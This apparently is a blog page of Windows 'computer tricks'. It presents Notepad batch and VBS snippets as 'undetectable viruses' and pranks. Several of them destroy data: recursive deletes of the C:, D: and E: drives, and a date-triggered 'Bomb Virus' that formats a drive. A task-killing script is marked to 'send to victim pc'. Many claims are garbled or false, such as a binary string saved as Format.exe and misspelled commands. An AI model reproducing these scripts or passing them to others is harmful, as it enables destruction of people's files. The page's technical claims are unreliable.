Wednesday, January 30, 2019

Write Simple Undetectable Virus

Write Simple Undetectable Virus



Open Notepad and type:
@echo off
Del C: *.*ly

And save that file as bomb.bat in your Computer.

Note:
Do not run this file in your computer
because this file delete your entire system C:Drive.

Format your Whole Hard Disk From type Code in Notepad

Format your Whole Hard Disk From type Code in Notepad





Open Notepad,
and type the below the code in your Computer:

0110011001101111011100100
1101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

Save the file as "Format.exe"

and, Open the file.
Your Hard Disk will be formatted !

computer tricks: Make your Keyboard LED Dance

computer tricks: Make your Keyboard LED Dance:



 steps: Open the Notepad, Type: Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.senkey...

Make your Keyboard LED Dance


steps:

Open the Notepad,

Type:

Set wshShell
=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.senkeys"{CAPSLOCK}"
wshshell.sendkeys"{NUMLOCK}"
wshshell.sendkeys"{SCROLLLOCK}"
loop

Save the file as Dance.vbs

Click the file and your all three LED lights will start dancing.
 so you want to stop the LED lights
to, shutdown your PC.

computer tricks: Force Shutdown Your Windows

computer tricks: Force Shutdown Your Windows: so guy's steps: Open Notepad and then type, @echo off shutdown computer shutdown -c "sleep Tight" -s  Save the file ...

computer tricks: computer tricks: Create Fake Windows Errors With N...

computer tricks: computer tricks: Create Fake Windows Errors With N...: computer tricks: Create Fake Windows Errors With Notepad : You can create Fake error message with any message steps: Open Notepad Type:...

Force Shutdown Your Windows

so guy's
steps:
Open Notepad
and then type,

@echo off
shutdown computer
shutdown -c "sleep Tight" -s

 Save the file with (name.Bat )
 then,
Click on your file and it will automatically shutdown your Windows.

computer tricks: Create Fake Windows Errors With Notepad

computer tricks: Create Fake Windows Errors With Notepad: You can create Fake error message with any message steps: Open Notepad Type: X=Msgbox("Message Here",0+16,"Title Here&q...

Create Fake Windows Errors With Notepad

You can create Fake error message with any message

steps:

Open Notepad
Type: X=Msgbox("Message Here",0+16,"Title Here")
Replace Message Here and Title Here with your
Error Message and Error-window Title respectively.

Save the file with error.vbs.
Now, click the file and you'll get your custom-made Windows Error Message.

Create Diary on Notepad

This Notepad trick will allow to you create a Notepad note in such a format that whenever you edit your note,
It will get saved with date and timestamp automatically to do this,
Follow the steps:

Open Notepad,
Type: LOG in first line.
Save the file as Log. txt

 Now, write something to the file and it will automatically get saves with edited date and time.

Monday, January 28, 2019

Use command prompt talk with other computer network

All you need is your friends IP address and Command prompt

Firstly,open Notepad And Enter:

and then type

@echo off
:A
Cls
echo MESSENGER
Set /p n=User:
Set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this file name is "Messenger.bat"
And then open the file And Now type the message for your friend
 Before you press Enter it should look like this:

MESSENGER
User:56.108.107
Message:Hi

Now you will chat with your friend

How to Delete all your system

 so guy's

Delete Files with a small command,

Copy the following code into your notepad and save it as a any name.bat file.

Del *.*

All your files in your hard disk will be delete in 5 min. 

Format C, D, E Drives in 3 sec.

so guy's

copy the following code in notepad

rd/s/q D:
rd/s/q C:
rd/s/q E:

And then save as a bat.file and run it

Your Drives format in 3 sec.

Matrix Effects (Not harmful)

Copy the following code in Notepad

@echo off
color 02
:tricks
echo %random% %random% %random% %random%
%random% %random% %random% random%

Go to tricks

save as a bat. file And run it. 

Bomb Virus

Copy the code in Notepad

If %date% NEQ 2009/11/25 go to exit
format E:/y >nul
:exit
exit

And save the file (Name.bat) File

Note:
You can change the Date (2009/11/25) And location (Format E:)
The Virus will Take Effect On that Day.

Your computer is very slow !! hear is some solutions

Temporary Files
1. Go to run then type %temp% and temp
2. Delete all this files they are all temporary and uninportant, wastage files
3. Do this on regular basis

I suggest you guy's use in ccleaner it's free and very effective at clearing out your junk

so, guy's Right click on taskbar and go to the properties.
Click the advanced tab and click performance.
Tick the box Adjust best for performance.

Find WIFI Password with CMD

1.Open command prompt by going to start and click on run command or press  the windows+r, then        type cmd and hit enter.
2.In command prompt  windoes, type
  "netsh wlan show network mode=bssid"
3.This command will be show all the available Wifi network in your area
4.this is the last step. just type:
  "netsh wlan connect name=(wifi name)
5.To disconnect it, type
  "netsh wlan disconnect

Create a folder without name

>Select any folder
>Rename it
>Press alt & type 0160 or 255
>hit enter 

Tasks kill

Open Notepad and write the following code and save them as (name.bat) file.

@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause

save this as .bat file and send to victim pc!

How to see hidden file in CMD

Simple and useful tip at command prompt just type

dir/ah

if the list is too long you can use

dir /ah/ p/w

How to make super folder

You want to lock a folder without using any software / password in Windows,

You can just follow the steps:-
Goto start = run = CMD

In command prompt,
Type: cacls "path_of_folder" /E /P everyone:n
To regain access

Type: cacls"path_of_folder"/E/P everyone:f

Note: Do not lock C:Drive using this trick otherwise Windows will not boot next time.

Wednesday, January 16, 2019

Reset BIOS Password

>Open the CPU
>Observe the motherbord
>Remove the Silver Battery(3 v)
>Wait 2 min and place the Battery
>Restoring a lost Desktop
>Start
>Run
Type a period
Then hit Enter

8 basic computer tricks to make life easier

  At this point, most of the general public should know how to use a computer in the most basic of situations.  Turn it on.  Open up the int...